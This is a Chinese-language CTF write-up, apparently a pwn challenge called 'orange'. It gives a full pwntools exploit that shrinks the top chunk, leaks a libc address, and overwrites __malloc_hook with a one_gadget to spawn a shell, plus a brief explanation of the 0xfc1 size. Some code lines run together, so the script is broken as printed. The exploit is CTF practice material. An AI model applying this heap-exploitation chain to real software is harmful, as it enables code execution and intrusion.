查看保护

查看ida

这里我们仅可以修改最新申请出来的堆块，但是有uaf漏洞。

完整exp：

from pwn import*
#context(log_level='debug')
p=process('./orange')
free_got=0x201F78def alloc(size,content):p.sendlineafter(b'Please input your choice:',b'1')p.sendlineafter(b'Please input the length of the diary content:',str(size))p.sendafter(b'Please enter the diary content:',content)
def show():p.sendlineafter(b'Please input your choice:',b'2')
def free():p.sendlineafter(b'Please input your choice:',b'3')
def edit(content):p.sendlineafter(b'Please input your choice:',b'4')p.sendlineafter(b'Please input the length of the diary content:',str(len(content)))p.sendafter(b'Please enter the diary content:',content)p.sendafter(b'Please tell me your name.',b'a')
alloc(0x38,b'aaaa')
pause()
payload=b'\x00'*0x38+p64(0xfc1)
edit(payload)
alloc(0xfd0,b'a'*8)
alloc(0x68,b'a'*8)
show()
onelibc=u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
print("onelibc="+hex(onelibc))
mallochook=onelibc-0x678
libc=ELF('/home/pwn/glibc-all-in-one/libs/2.23-0ubuntu3_amd64/libc-2.23.so')
libcbase=mallochook-libc.sym['__malloc_hook']
system=libcbase+libc.sym['system']
binsh=libcbase+next(libc.search(b'/bin/sh'))
gadget=[0x4525a,0xef9f4,0xf0897]
onegadget=libcbase+gadget[1]
free()
payload=p64(mallochook-0x23)
edit(payload)
payload=b'\x00'*0x13+p64(onegadget)
alloc(0x68,b'aa')
alloc(0x68,payload)
p.sendlineafter(b'Please input your choice:',b'1')
p.sendlineafter(b'Please input the length of the diary content:',str(1))
p.interactive()

#补充1：我们通过修改topchunk的size，再申请一个比topchunk大的堆块把topchunk释放到unsortedbin中，这里的0xfc1是有讲究的，因为要跟原topchunk的size页对齐。